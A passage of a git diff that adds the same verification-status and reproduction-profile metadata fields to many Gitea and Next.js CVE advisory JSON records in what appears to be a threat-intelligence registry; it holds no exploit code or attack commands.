null, "metadata": { "source_names": [ "OSV Gitea" diff --git a/08-threat-intel/registry/advisories/gitea--CVE-2022-1058.json b/08-threat-intel/registry/advisories/gitea--CVE-2022-1058.json index 594faa04..34e7a51c 100644 --- a/08-threat-intel/registry/advisories/gitea--CVE-2022-1058.json +++ b/08-threat-intel/registry/advisories/gitea--CVE-2022-1058.json @@ -51,6 +51,19 @@ ], "status": "generated", "triage_reasons": [], + "verification_status": "triage-manual", + "verification_mode": "synthetic", + "last_verified_at": null, + "last_run_id": null, + "evidence_bundle": null, + "browser_evidence": { + "required": false, + "present": false, + "refs": [] + }, + "repro_profile_id": "proxy-boundary-generic", + "artifact_mode": "synthetic", + "blocked_reason": null, "metadata": { "source_names": [ "OSV Gitea" diff --git a/08-threat-intel/registry/advisories/gitea--CVE-2022-1928.json b/08-threat-intel/registry/advisories/gitea--CVE-2022-1928.json index fe00b34d..2bcd2fdf 100644 --- a/08-threat-intel/registry/advisories/gitea--CVE-2022-1928.json +++ b/08-threat-intel/registry/advisories/gitea--CVE-2022-1928.json @@ -53,6 +53,19 @@ ], "status": "generated", "triage_reasons": [], + "verification_status": "triage-manual", + "verification_mode": "synthetic", + "last_verified_at": null, + "last_run_id": null, + "evidence_bundle": null, + "browser_evidence": { + "required": false, + "present": false, + "refs": [] + }, + "repro_profile_id": "xss-generic", + "artifact_mode": "synthetic", + "blocked_reason": null, "metadata": { "source_names": [ "OSV Gitea" diff --git a/08-threat-intel/registry/advisories/gitea--CVE-2022-27313.json b/08-threat-intel/registry/advisories/gitea--CVE-2022-27313.json index 4e7195f6..4b341afa 100644 --- a/08-threat-intel/registry/advisories/gitea--CVE-2022-27313.json +++ b/08-threat-intel/registry/advisories/gitea--CVE-2022-27313.json @@ -49,6 +49,19 @@ ], "status": "generated", "triage_reasons": [], + "verification_status": "triage-manual", + "verification_mode": "synthetic", + "last_verified_at": null, + "last_run_id": null, + "evidence_bundle": null, + "browser_evidence": { + "required": false, + "present": false, + "refs": [] + }, + "repro_profile_id": "proxy-boundary-generic", + "artifact_mode": "synthetic", + "blocked_reason": null, "metadata": { "source_names": [ "OSV Gitea" diff --git a/08-threat-intel/registry/advisories/gitea--CVE-2022-30781.json b/08-threat-intel/registry/advisories/gitea--CVE-2022-30781.json index 327315a8..fcf9f77c 100644 --- a/08-threat-intel/registry/advisories/gitea--CVE-2022-30781.json +++ b/08-threat-intel/registry/advisories/gitea--CVE-2022-30781.json @@ -52,6 +52,19 @@ ], "status": "generated", "triage_reasons": [], + "verification_status": "triage-manual", + "verification_mode": "synthetic", + "last_verified_at": null, + "last_run_id": null, + "evidence_bundle": null, + "browser_evidence": { + "required": false, + "present": false, + "refs": [] + }, + "repro_profile_id": "proxy-boundary-generic", + "artifact_mode": "synthetic", + "blocked_reason": null, "metadata": { "source_names": [ "OSV Gitea" diff --git a/08-threat-intel/registry/advisories/gitea--CVE-2022-38183.json b/08-threat-intel/registry/advisories/gitea--CVE-2022-38183.json index e927aaf8..45a1a93b 100644 --- a/08-threat-intel/registry/advisories/gitea--CVE-2022-38183.json +++ b/08-threat-intel/registry/advisories/gitea--CVE-2022-38183.json @@ -51,6 +51,19 @@ ], "status": "generated", "triage_reasons": [], + "verification_status": "triage-manual", + "verification_mode": "synthetic", + "last_verified_at": null, + "last_run_id": null, + "evidence_bundle": null, + "browser_evidence": { + "required": false, + "present": false, + "refs": [] + }, + "repro_profile_id": "proxy-boundary-generic", + "artifact_mode": "synthetic", + "blocked_reason": null, "metadata": { "source_names": [ "OSV Gitea" diff --git a/08-threat-intel/registry/advisories/gitea--CVE-2022-38795.json b/08-threat-intel/registry/advisories/gitea--CVE-2022-38795.json index 139399ce..198575f9 100644 --- a/08-threat-intel/registry/advisories/gitea--CVE-2022-38795.json +++ b/08-threat-intel/registry/advisories/gitea--CVE-2022-38795.json @@ -50,6 +50,19 @@ ], "status": "generated", "triage_reasons": [], + "verification_status": "triage-manual", + "verification_mode": "synthetic", + "last_verified_at": null, + "last_run_id": null, + "evidence_bundle": null, + "browser_evidence": { + "required": false, + "present": false, + "refs": [] + }, + "repro_profile_id": "proxy-boundary-generic", + "artifact_mode": "synthetic", + "blocked_reason": null, "metadata": { "source_names": [ "OSV Gitea" diff --git a/08-threat-intel/registry/advisories/gitea--CVE-2022-42968.json b/08-threat-intel/registry/advisories/gitea--CVE-2022-42968.json index f6627d71..dc949dd9 100644 --- a/08-threat-intel/registry/advisories/gitea--CVE-2022-42968.json +++ b/08-threat-intel/registry/advisories/gitea--CVE-2022-42968.json @@ -50,6 +50,19 @@ ], "status": "generated", "triage_reasons": [], + "verification_status": "triage-manual", + "verification_mode": "synthetic", + "last_verified_at": null, + "last_run_id": null, + "evidence_bundle": null, + "browser_evidence": { + "required": false, + "present": false, + "refs": [] + }, + "repro_profile_id": "proxy-boundary-generic", + "artifact_mode": "synthetic", + "blocked_reason": null, "metadata": { "source_names": [ "OSV Gitea" diff --git a/08-threat-intel/registry/advisories/gitea--CVE-2025-68938.json b/08-threat-intel/registry/advisories/gitea--CVE-2025-68938.json index 46cb1b94..e3abddb9 100644 --- a/08-threat-intel/registry/advisories/gitea--CVE-2025-68938.json +++ b/08-threat-intel/registry/advisories/gitea--CVE-2025-68938.json @@ -50,6 +50,19 @@ ], "status": "generated", "triage_reasons": [], + "verification_status": "triage-manual", + "verification_mode": "synthetic", + "last_verified_at": null, + "last_run_id": null, + "evidence_bundle": null, + "browser_evidence": { + "required": false, + "present": false, + "refs": [] + }, + "repro_profile_id": "proxy-boundary-generic", + "artifact_mode": "synthetic", + "blocked_reason": null, "metadata": { "source_names": [ "OSV Gitea" diff --git a/08-threat-intel/registry/advisories/gitea--CVE-2025-68939.json b/08-threat-intel/registry/advisories/gitea--CVE-2025-68939.json index 86e8a34a..325a7173 100644 --- a/08-threat-intel/registry/advisories/gitea--CVE-2025-68939.json +++ b/08-threat-intel/registry/advisories/gitea--CVE-2025-68939.json @@ -49,6 +49,19 @@ ], "status": "generated", "triage_reasons": [], + "verification_status": "triage-manual", + "verification_mode": "synthetic", + "last_verified_at": null, + "last_run_id": null, + "evidence_bundle": null, + "browser_evidence": { + "required": false, + "present": false, + "refs": [] + }, + "repro_profile_id": "file-upload-generic", + "artifact_mode": "synthetic", + "blocked_reason": null, "metadata": { "source_names": [ "OSV Gitea" diff --git a/08-threat-intel/registry/advisories/gitea--CVE-2025-68940.json b/08-threat-intel/registry/advisories/gitea--CVE-2025-68940.json index dd4f19b6..a0d17f80 100644 --- a/08-threat-intel/registry/advisories/gitea--CVE-2025-68940.json +++ b/08-threat-intel/registry/advisories/gitea--CVE-2025-68940.json @@ -50,6 +50,19 @@ ], "status": "generated", "triage_reasons": [], + "verification_status": "triage-manual", + "verification_mode": "synthetic", + "last_verified_at": null, + "last_run_id": null, + "evidence_bundle": null, + "browser_evidence": { + "required": false, + "present": false, + "refs": [] + }, + "repro_profile_id": "authz-bypass-generic", + "artifact_mode": "synthetic", + "blocked_reason": null, "metadata": { "source_names": [ "OSV Gitea" diff --git a/08-threat-intel/registry/advisories/gitea--CVE-2025-68941.json b/08-threat-intel/registry/advisories/gitea--CVE-2025-68941.json index 301d2646..3983ea64 100644 --- a/08-threat-intel/registry/advisories/gitea--CVE-2025-68941.json +++ b/08-threat-intel/registry/advisories/gitea--CVE-2025-68941.json @@ -50,6 +50,19 @@ ], "status": "generated", "triage_reasons": [], + "verification_status": "triage-manual", + "verification_mode": "synthetic", + "last_verified_at": null, + "last_run_id": null, + "evidence_bundle": null, + "browser_evidence": { + "required": false, + "present": false, + "refs": [] + }, + "repro_profile_id": "proxy-boundary-generic", + "artifact_mode": "synthetic", + "blocked_reason": null, "metadata": { "source_names": [ "OSV Gitea" diff --git a/08-threat-intel/registry/advisories/gitea--CVE-2025-68942.json b/08-threat-intel/registry/advisories/gitea--CVE-2025-68942.json index 31f21ecf..26ef4b51 100644 --- a/08-threat-intel/registry/advisories/gitea--CVE-2025-68942.json +++ b/08-threat-intel/registry/advisories/gitea--CVE-2025-68942.json @@ -51,6 +51,19 @@ ], "status": "generated", "triage_reasons": [], + "verification_status": "triage-manual", + "verification_mode": "synthetic", + "last_verified_at": null, + "last_run_id": null, + "evidence_bundle": null, + "browser_evidence": { + "required": false, + "present": false, + "refs": [] + }, + "repro_profile_id": "xss-generic", + "artifact_mode": "synthetic", + "blocked_reason": null, "metadata": { "source_names": [ "OSV Gitea" diff --git a/08-threat-intel/registry/advisories/gitea--CVE-2025-68943.json b/08-threat-intel/registry/advisories/gitea--CVE-2025-68943.json index 7d5b5b8a..67746285 100644 --- a/08-threat-intel/registry/advisories/gitea--CVE-2025-68943.json +++ b/08-threat-intel/registry/advisories/gitea--CVE-2025-68943.json @@ -50,6 +50,19 @@ ], "status": "generated", "triage_reasons": [], + "verification_status": "triage-manual", + "verification_mode": "synthetic", + "last_verified_at": null, + "last_run_id": null, + "evidence_bundle": null, + "browser_evidence": { + "required": false, + "present": false, + "refs": [] + }, + "repro_profile_id": "proxy-boundary-generic", + "artifact_mode": "synthetic", + "blocked_reason": null, "metadata": { "source_names": [ "OSV Gitea" diff --git a/08-threat-intel/registry/advisories/gitea--CVE-2025-68944.json b/08-threat-intel/registry/advisories/gitea--CVE-2025-68944.json index 2091c3fa..8b2e201e 100644 --- a/08-threat-intel/registry/advisories/gitea--CVE-2025-68944.json +++ b/08-threat-intel/registry/advisories/gitea--CVE-2025-68944.json @@ -51,6 +51,19 @@ ], "status": "generated", "triage_reasons": [], + "verification_status": "triage-manual", + "verification_mode": "synthetic", + "last_verified_at": null, + "last_run_id": null, + "evidence_bundle": null, + "browser_evidence": { + "required": false, + "present": false, + "refs": [] + }, + "repro_profile_id": "authz-bypass-generic", + "artifact_mode": "synthetic", + "blocked_reason": null, "metadata": { "source_names": [ "OSV Gitea" diff --git a/08-threat-intel/registry/advisories/gitea--CVE-2025-68945.json b/08-threat-intel/registry/advisories/gitea--CVE-2025-68945.json index 1b47135b..1bd7f5fd 100644 --- a/08-threat-intel/registry/advisories/gitea--CVE-2025-68945.json +++ b/08-threat-intel/registry/advisories/gitea--CVE-2025-68945.json @@ -50,6 +50,19 @@ ], "status": "generated", "triage_reasons": [], + "verification_status": "triage-manual", + "verification_mode": "synthetic", + "last_verified_at": null, + "last_run_id": null, + "evidence_bundle": null, + "browser_evidence": { + "required": false, + "present": false, + "refs": [] + }, + "repro_profile_id": "proxy-boundary-generic", + "artifact_mode": "synthetic", + "blocked_reason": null, "metadata": { "source_names": [ "OSV Gitea" diff --git a/08-threat-intel/registry/advisories/gitea--CVE-2025-68946.json b/08-threat-intel/registry/advisories/gitea--CVE-2025-68946.json index 751816b8..ef61a024 100644 --- a/08-threat-intel/registry/advisories/gitea--CVE-2025-68946.json +++ b/08-threat-intel/registry/advisories/gitea--CVE-2025-68946.json @@ -51,6 +51,19 @@ ], "status": "generated", "triage_reasons": [], + "verification_status": "triage-manual", + "verification_mode": "synthetic", + "last_verified_at": null, + "last_run_id": null, + "evidence_bundle": null, + "browser_evidence": { + "required": false, + "present": false, + "refs": [] + }, + "repro_profile_id": "xss-generic", + "artifact_mode": "synthetic", + "blocked_reason": null, "metadata": { "source_names": [ "OSV Gitea" diff --git a/08-threat-intel/registry/advisories/gitea--CVE-2025-69413.json b/08-threat-intel/registry/advisories/gitea--CVE-2025-69413.json index b4f7e946..7ce75698 100644 --- a/08-threat-intel/registry/advisories/gitea--CVE-2025-69413.json +++ b/08-threat-intel/registry/advisories/gitea--CVE-2025-69413.json @@ -51,6 +51,19 @@ ], "status": "generated", "triage_reasons": [], + "verification_status": "triage-manual", + "verification_mode": "synthetic", + "last_verified_at": null, + "last_run_id": null, + "evidence_bundle": null, + "browser_evidence": { + "required": false, + "present": false, + "refs": [] + }, + "repro_profile_id": "proxy-boundary-generic", + "artifact_mode": "synthetic", + "blocked_reason": null, "metadata": { "source_names": [ "OSV Gitea" diff --git a/08-threat-intel/registry/advisories/gitea--CVE-2026-0798.json b/08-threat-intel/registry/advisories/gitea--CVE-2026-0798.json index d80d8c59..0c68933d 100644 --- a/08-threat-intel/registry/advisories/gitea--CVE-2026-0798.json +++ b/08-threat-intel/registry/advisories/gitea--CVE-2026-0798.json @@ -52,6 +52,19 @@ ], "status": "generated", "triage_reasons": [], + "verification_status": "triage-manual", + "verification_mode": "synthetic", + "last_verified_at": null, + "last_run_id": null, + "evidence_bundle": null, + "browser_evidence": { + "required": false, + "present": false, + "refs": [] + }, + "repro_profile_id": "proxy-boundary-generic", + "artifact_mode": "synthetic", + "blocked_reason": null, "metadata": { "source_names": [ "OSV Gitea" diff --git a/08-threat-intel/registry/advisories/gitea--CVE-2026-20736.json b/08-threat-intel/registry/advisories/gitea--CVE-2026-20736.json index 31a007b7..8b43a887 100644 --- a/08-threat-intel/registry/advisories/gitea--CVE-2026-20736.json +++ b/08-threat-intel/registry/advisories/gitea--CVE-2026-20736.json @@ -54,6 +54,19 @@ ], "status": "generated", "triage_reasons": [], + "verification_status": "triage-manual", + "verification_mode": "synthetic", + "last_verified_at": null, + "last_run_id": null, + "evidence_bundle": null, + "browser_evidence": { + "required": false, + "present": false, + "refs": [] + }, + "repro_profile_id": "authz-bypass-generic", + "artifact_mode": "synthetic", + "blocked_reason": null, "metadata": { "source_names": [ "OSV Gitea" diff --git a/08-threat-intel/registry/advisories/gitea--CVE-2026-20750.json b/08-threat-intel/registry/advisories/gitea--CVE-2026-20750.json index 240626b0..08aced51 100644 --- a/08-threat-intel/registry/advisories/gitea--CVE-2026-20750.json +++ b/08-threat-intel/registry/advisories/gitea--CVE-2026-20750.json @@ -54,6 +54,19 @@ ], "status": "generated", "triage_reasons": [], + "verification_status": "triage-manual", + "verification_mode": "synthetic", + "last_verified_at": null, + "last_run_id": null, + "evidence_bundle": null, + "browser_evidence": { + "required": false, + "present": false, + "refs": [] + }, + "repro_profile_id": "proxy-boundary-generic", + "artifact_mode": "synthetic", + "blocked_reason": null, "metadata": { "source_names": [ "OSV Gitea" diff --git a/08-threat-intel/registry/advisories/gitea--CVE-2026-20800.json b/08-threat-intel/registry/advisories/gitea--CVE-2026-20800.json index 3607b578..7235c93e 100644 --- a/08-threat-intel/registry/advisories/gitea--CVE-2026-20800.json +++ b/08-threat-intel/registry/advisories/gitea--CVE-2026-20800.json @@ -53,6 +53,19 @@ ], "status": "generated", "triage_reasons": [], + "verification_status": "triage-manual", + "verification_mode": "synthetic", + "last_verified_at": null, + "last_run_id": null, + "evidence_bundle": null, + "browser_evidence": { + "required": false, + "present": false, + "refs": [] + }, + "repro_profile_id": "proxy-boundary-generic", + "artifact_mode": "synthetic", + "blocked_reason": null, "metadata": { "source_names": [ "OSV Gitea" diff --git a/08-threat-intel/registry/advisories/gitea--CVE-2026-20883.json b/08-threat-intel/registry/advisories/gitea--CVE-2026-20883.json index 9aac5528..42df3c53 100644 --- a/08-threat-intel/registry/advisories/gitea--CVE-2026-20883.json +++ b/08-threat-intel/registry/advisories/gitea--CVE-2026-20883.json @@ -54,6 +54,19 @@ ], "status": "generated", "triage_reasons": [], + "verification_status": "triage-manual", + "verification_mode": "synthetic", + "last_verified_at": null, + "last_run_id": null, + "evidence_bundle": null, + "browser_evidence": { + "required": false, + "present": false, + "refs": [] + }, + "repro_profile_id": "proxy-boundary-generic", + "artifact_mode": "synthetic", + "blocked_reason": null, "metadata": { "source_names": [ "OSV Gitea" diff --git a/08-threat-intel/registry/advisories/gitea--CVE-2026-20888.json b/08-threat-intel/registry/advisories/gitea--CVE-2026-20888.json index fee4180f..3369a384 100644 --- a/08-threat-intel/registry/advisories/gitea--CVE-2026-20888.json +++ b/08-threat-intel/registry/advisories/gitea--CVE-2026-20888.json @@ -53,6 +53,19 @@ ], "status": "generated", "triage_reasons": [], + "verification_status": "triage-manual", + "verification_mode": "synthetic", + "last_verified_at": null, + "last_run_id": null, + "evidence_bundle": null, + "browser_evidence": { + "required": false, + "present": false, + "refs": [] + }, + "repro_profile_id": "proxy-boundary-generic", + "artifact_mode": "synthetic", + "blocked_reason": null, "metadata": { "source_names": [ "OSV Gitea" diff --git a/08-threat-intel/registry/advisories/gitea--CVE-2026-20897.json b/08-threat-intel/registry/advisories/gitea--CVE-2026-20897.json index ff0b600f..facaee84 100644 --- a/08-threat-intel/registry/advisories/gitea--CVE-2026-20897.json +++ b/08-threat-intel/registry/advisories/gitea--CVE-2026-20897.json @@ -54,6 +54,19 @@ ], "status": "generated", "triage_reasons": [], + "verification_status": "triage-manual", + "verification_mode": "synthetic", + "last_verified_at": null, + "last_run_id": null, + "evidence_bundle": null, + "browser_evidence": { + "required": false, + "present": false, + "refs": [] + }, + "repro_profile_id": "proxy-boundary-generic", + "artifact_mode": "synthetic", + "blocked_reason": null, "metadata": { "source_names": [ "OSV Gitea" diff --git a/08-threat-intel/registry/advisories/gitea--CVE-2026-20904.json b/08-threat-intel/registry/advisories/gitea--CVE-2026-20904.json index 21399f57..237e3201 100644 --- a/08-threat-intel/registry/advisories/gitea--CVE-2026-20904.json +++ b/08-threat-intel/registry/advisories/gitea--CVE-2026-20904.json @@ -54,6 +54,19 @@ ], "status": "generated", "triage_reasons": [], + "verification_status": "triage-manual", + "verification_mode": "synthetic", + "last_verified_at": null, + "last_run_id": null, + "evidence_bundle": null, + "browser_evidence": { + "required": false, + "present": false, + "refs": [] + }, + "repro_profile_id": "proxy-boundary-generic", + "artifact_mode": "synthetic", + "blocked_reason": null, "metadata": { "source_names": [ "OSV Gitea" diff --git a/08-threat-intel/registry/advisories/gitea--CVE-2026-20912.json b/08-threat-intel/registry/advisories/gitea--CVE-2026-20912.json index 7cde2117..78606400 100644 --- a/08-threat-intel/registry/advisories/gitea--CVE-2026-20912.json +++ b/08-threat-intel/registry/advisories/gitea--CVE-2026-20912.json @@ -54,6 +54,19 @@ ], "status": "generated", "triage_reasons": [], + "verification_status": "triage-manual", + "verification_mode": "synthetic", + "last_verified_at": null, + "last_run_id": null, + "evidence_bundle": null, + "browser_evidence": { + "required": false, + "present": false, + "refs": [] + }, + "repro_profile_id": "file-upload-generic", + "artifact_mode": "synthetic", + "blocked_reason": null, "metadata": { "source_names": [ "OSV Gitea" diff --git a/08-threat-intel/registry/advisories/nextjs--CVE-2020-15242.json b/08-threat-intel/registry/advisories/nextjs--CVE-2020-15242.json index 4a7be19e..4157c87b 100644 --- a/08-threat-intel/registry/advisories/nextjs--CVE-2020-15242.json +++ b/08-threat-intel/registry/advisories/nextjs--CVE-2020-15242.json @@ -47,6 +47,19 @@ ], "status": "generated", "triage_reasons": [], + "verification_status": "triage-manual", + "verification_mode": "synthetic", + "last_verified_at": null, + "last_run_id": null, + "evidence_bundle": null, + "browser_evidence": { + "required": false, + "present": false, + "refs": [] + }, + "repro_profile_id": "proxy-boundary-generic", + "artifact_mode": "synthetic", + "blocked_reason": null, "metadata": { "source_names": [ "OSV Next.js" diff --git a/08-threat-intel/registry/advisories/nextjs--CVE-2020-5284.json b/08-threat-intel/registry/advisories/nextjs--CVE-2020-5284.json index 36ac2595..7715bd93 100644 --- a/08-threat-intel/registry/advisories/nextjs--CVE-2020-5284.json +++ b/08-threat-intel/registry/advisories/nextjs--CVE-2020-5284.json @@ -48,6 +48,19 @@ ], "status": "generated", "triage_reasons": [], + "verification_status": "triage-manual", + "verification_mode": "synthetic", + "last_verified_at": null, + "last_run_id": null, + "evidence_bundle": null, + "browser_evidence": { + "required": false, + "present": false, + "refs": [] + }, + "repro_profile_id": "proxy-boundary-generic", + "artifact_mode": "synthetic", + "blocked_reason": null, "metadata": { "source_names": [ "OSV Next.js" diff --git a/08-threat-intel/registry/advisories/nextjs--CVE-2021-37699.json b/08-threat-intel/registry/advisories/nextjs--CVE-2021-37699.json index 2d226ad0..e5eae164 100644 --- a/08-threat-intel/registry/advisories/nextjs--CVE-2021-37699.json +++ b/08-threat-intel/registry/advisories/nextjs--CVE-2021-37699.json @@ -48,6 +48,19 @@ ], "status": "generated", "triage_reasons": [], + "verification_status": "triage-manual", + "verification_mode": "synthetic", + "last_verified_at": null, + "last_run_id": null, + "evidence_bundle": null, + "browser_evidence": { + "required": false, + "present": false, + "refs": [] + }, + "repro_profile_id": "proxy-boundary-generic", + "artifact_mode": "synthetic", + "blocked_reason": null, "metadata": { "source_names": [ "OSV Next.js" diff --git a/08-threat-intel/registry/advisories/nextjs--CVE-2021-39178.json b/08-threat-intel/registry/advisories/nextjs--CVE-2021-39178.json index ac7de24f..fa4ecbc7 100644 --- a/08-threat-intel/registry/advisories/nextjs--CVE-2021-39178.json +++ b/08-threat-intel/registry/advisories/nextjs--CVE-2021-39178.json @@ -50,6 +50,19 @@ ], "status": "generated", "triage_reasons": [], + "verification_status": "triage-manual", + "verification_mode": "synthetic", + "last_verified_at": null, + "last_run_id": null, + "evidence_bundle": null, + "browser_evidence": { + "required": false, + "present": false, + "refs": [] + }, + "repro_profile_id": "xss-generic", + "artifact_mode": "synthetic", + "blocked_reason": null, "metadata": { "source_names": [ "OSV Next.js" diff --git a/08-threat-intel/registry/advisories/nextjs--CVE-2021-43803.json b/08-threat-intel/registry/advisories/nextjs--CVE-2021-43803.json index a46e0eee..29442db7 100644 --- a/08-threat-intel/registry/advisories/nextjs--CVE-2021-43803.json +++ b/08-threat-intel/registry/advisories/nextjs--CVE-2021-43803.json @@ -53,6 +53,19 @@ ], "status": "generated", "triage_reasons": [], + "verification_status": "triage-manual", + "verification_mode": "synthetic", + "last_verified_at": null, + "last_run_id": null, + "evidence_bundle": null, + "browser_evidence": { + "required": false, + "present": false, + "refs": [] + }, + "repro_profile_id": "proxy-boundary-generic", + "artifact_mode": "synthetic", + "blocked_reason": null, "metadata": { "source_names": [ "OSV Next.js" diff --git a/08-threat-intel/registry/advisories/nextjs--CVE-2024-34351.json b/08-threat-intel/registry/advisories/nextjs--CVE-2024-34351.json index 3c96faa6..7e488477 100644 --- a/08-threat-intel/registry/advisories/nextjs--CVE-2024-34351.json +++ b/08-threat-intel/registry/advisories/nextjs--CVE-2024-34351.json @@ -49,6 +49,19 @@ ], "status": "generated", "triage_reasons": [], + "verification_status": "triage-manual", + "verification_mode": "synthetic", + "last_verified_at": null, + "last_run_id": null, + "evidence_bundle": null, + "browser_evidence": { + "required": false, + "present": false, + "refs": [] + }, + "repro_profile_id": "ssrf-generic", + "artifact_mode": "synthetic", + "blocked_reason": null, "metadata": { "source_names": [ "OSV Next.js" diff --git a/08-threat-intel/registry/advisories/nextjs--CVE-2024-46982.json b/08-threat-intel/registry/advisories/nextjs--CVE-2024-46982.json index bb27b92b..0b97c6dc 100644 --- a/08-threat-intel/registry/advisories/nextjs--CVE-2024-46982.json +++ b/08-threat-intel/registry/advisories/nextjs--CVE-2024-46982.json @@ -50,6 +50,19 @@ ], "status": "generated", "triage_reasons": [], + "verification_status": "triage-manual", + "verification_mode": "synthetic", + "last_verified_at": null, + "last_run_id": null, + "evidence_bundle": null, + "browser_evidence": { + "required": false, + "present": false, + "refs": [] + }, + "repro_profile_id": "proxy-boundary-generic", + "artifact_mode": "synthetic", + "blocked_reason": null, "metadata": { "source_names": [ "OSV Next.js" diff --git a/08-threat-intel/registry/advisories/nextjs--CVE-2024-47831.json b/08-threat-intel/registry/advisories/nextjs--CVE-2024-47831.json index 6c96fea9..5ecc9cd9 100644 --- a/08-threat-intel/registry/advisories/nextjs--CVE-2024-47831.json +++ b/08-threat-intel/registry/advisories/nextjs--CVE-2024-47831.json @@ -47,6 +47,19 @@ ], "status": "generated", "triage_reasons": [], + "verification_status": "triage-manual", + "verification_mode": "synthetic", + "last_verified_at": null, + "last_run_id": null, + "evidence_bundle": null, + "browser_evidence": { + "required": false, + "present": false, + "refs": [] + }, + "repro_profile_id": "proxy-boundary-generic", + "artifact_mode": "synthetic", + "blocked_reason": null, "metadata": { "source_names": [ "OSV Next.js" diff --git a/08-threat-intel/registry/advisories/nextjs--CVE-2024-51479.json b/08-threat-intel/registry/advisories/nextjs--CVE-2024-51479.json index b7db97ac..6a1bb62e 100644 --- a/08-threat-intel/registry/advisories/nextjs--CVE-2024-51479.json +++ b/08-threat-intel/registry/advisories/nextjs--CVE-2024-51479.json @@ -48,6 +48,19 @@ ], "status": "generated", "triage_reasons": [], + "verification_status": "triage-manual", + "verification_mode": "synthetic", + "last_verified_at": null, + "last_run_id": null, + "evidence_bundle": null, + "browser_evidence": { + "required": false, + "present": false, + "refs": [] + }, + "repro_profile_id": "authz-bypass-generic", + "artifact_mode": "synthetic", + "blocked_reason": null, "metadata": { "source_names": [ "OSV Next.js" diff --git a/08-threat-intel/registry/advisories/nextjs--CVE-2024-56332.json b/08-threat-intel/registry/advisories/nextjs--CVE-2024-56332.json index 8a1cc3df..afc9fcaa 100644 --- a/08-threat-intel/registry/advisories/nextjs--CVE-2024-56332.json +++ b/08-threat-intel/registry/advisories/nextjs--CVE-2024-56332.json @@ -50,6 +50,19 @@ ], "status": "generated", "triage_reasons": [], + "verification_status": "triage-manual", + "verification_mode": "synthetic", + "last_verified_at": null, + "last_run_id": null, + "evidence_bundle": null, + "browser_evidence": { + "required": false, + "present": false, + "refs": [] + }, + "repro_profile_id": "proxy-boundary-generic", + "artifact_mode": "synthetic", + "blocked_reason": null, "metadata": { "source_names": [ "OSV Next.js" diff --git a/08-threat-intel/registry/advisories/nextjs--CVE-2025-29927.json b/08-threat-intel/registry/advisories/nextjs--CVE-2025-29927.json index 00e3a563..141865e5 100644 --- a/08-threat-intel/registry/advisories/nextjs--CVE-2025-29927.json +++ b/08-threat-intel/registry/advisories/nextjs--CVE-2025-29927.json @@ -60,6 +60,19 @@ ], "status": "generated", "triage_reasons": [], + "verification_status": "triage-manual", + "verification_mode": "synthetic", + "last_verified_at": null, + "last_run_id": null, + "evidence_bundle": null, + "browser_evidence": { + "required": false, + "present": false, + "refs": [] + }, + "repro_profile_id": "authz-bypass-generic", + "artifact_mode": "synthetic", + "blocked_reason": null, "metadata": { "source_names": [ "OSV Next.js" diff --git a/08-threat-intel/registry/advisories/nextjs--CVE-2025-30218.json b/08-threat-intel/registry/advisories/nextjs--CVE-2025-30218.json index 3d66e50c..12bb6fb8 100644 --- a/08-threat-intel/registry/advisories/nextjs--CVE-2025-30218.json +++ b/08-threat-intel/registry/advisories/nextjs--CVE-2025-30218.json @@ -57,6 +57,19 @@ ], "status": "generated", "triage_reasons": [], + "verification_status": "triage-manual", + "verification_mode": "synthetic", + "last_verified_at": null, + "last_run_id": null, + "evidence_bundle": null, + "browser_evidence": { + "required": false, + "present": false, + "refs": [] + }, + "repro_profile_id": "proxy-boundary-generic", + "artifact_mode": "synthetic", + "blocked_reason": null, "metadata": { "source_names": [ "OSV Next.js" diff --git a/08-threat-intel/registry/advisories/nextjs--CVE-2025-32421.json b/08-threat-intel/registry/advisories/nextjs--CVE-2025-32421.json index d536ff0a..74db3506 100644 --- a/08-threat-intel/registry/advisories/nextjs--CVE-2025-32421.json +++ b/08-threat-intel/registry/advisories/nextjs--CVE-2025-32421.json @@ -49,6 +49,19 @@ ], "status": "generated", "triage_reasons": [], + "verification_status": "triage-manual", + "verification_mode": "synthetic", + "last_verified_at": null, + "last_run_id": null, + "evidence_bundle": null, + "browser_evidence": { + "required": false, + "present": false, + "refs": [] + }, + "repro_profile_id": "proxy-boundary-generic", + "artifact_mode": "synthetic", + "blocked_reason": null, "metadata": { "source_names": [ "OSV Next.js" diff --git a/08-threat-intel/registry/advisories/nextjs--CVE-2025-48068.json b/08-threat-intel/registry/advisories/nextjs--CVE-2025-48068.json index 4acc245f..2760266f 100644 --- a/08-threat-intel/registry/advisories/nextjs--CVE-2025-48068.json +++ b/08-threat-intel/registry/advisories/nextjs--CVE-2025-48068.json @@ -49,6 +49,19 @@ ], "status": "generated", "triage_reasons": [], + "verification_status": "triage-manual", + "verification_mode": "synthetic", + "last_verified_at": null, + "last_run_id": null, + "evidence_bundle": null, + "browser_evidence": { + "required": false, + "present": false, + "refs": [] + }, + "repro_profile_id": "proxy-boundary-generic", + "artifact_mode": "synthetic", + "blocked_reason": null, "metadata": { "source_names": [ "OSV Next.js" diff --git a/08-threat-intel/registry/advisories/nextjs--CVE-2025-49005.json b/08-threat-intel/registry/advisories/nextjs--CVE-2025-49005.json index 80305e1f..a152bc69 100644 --- a/08-threat-intel/registry/advisories/nextjs--CVE-2025-49005.json +++ b/08-threat-intel/registry/advisories/nextjs--CVE-2025-49005.json @@ -51,6 +51,19 @@ ], "status": "generated", "triage_reasons": [], + "verification_status": "triage-manual", + "verification_mode": "synthetic", + "last_verified_at": null, + "last_run_id": null, + "evidence_bundle": null, + "browser_evidence": { + "required": false, + "present": false, + "refs": [] + }, + "repro_profile_id": "proxy-boundary-generic", + "artifact_mode": "synthetic", + "blocked_reason": null, "metadata": { "source_names": [ "OSV Next.js" diff --git a/08-threat-intel/registry/advisories/nextjs--CVE-2025-49826.json b/08-threat-intel/registry/advisories/nextjs--CVE-2025-49826.json index e59725db..795fa79b 100644 --- a/08-threat-intel/registry/advisories/nextjs--CVE-2025-49826.json +++ b/08-threat-intel/registry/advisories/nextjs--CVE-2025-49826.json @@ -50,6 +50,19 @@ ], "status": "generated", "triage_reasons": [], + "verification_status": "triage-manual", + "verification_mode": "synthetic", + "last_verified_at": null, + "last_run_id": null, + "evidence_bundle": null, + "browser_evidence": { + "required": false, + "present": false, + "refs": [] + }, + "repro_profile_id": "proxy-boundary-generic", + "artifact_mode": "synthetic", + "blocked_reason": null, "metadata": { "source_names": [ "OSV Next.js" diff --git a/08-threat-intel/registry/advisories/nextjs--CVE-2025-55173.json b/08-threat-intel/registry/advisories/nextjs--CVE-2025-55173.json index 577f4969..ab8f2391 100644 --- a/08-threat-intel/registry/advisories/nextjs--CVE-2025-55173.json +++ 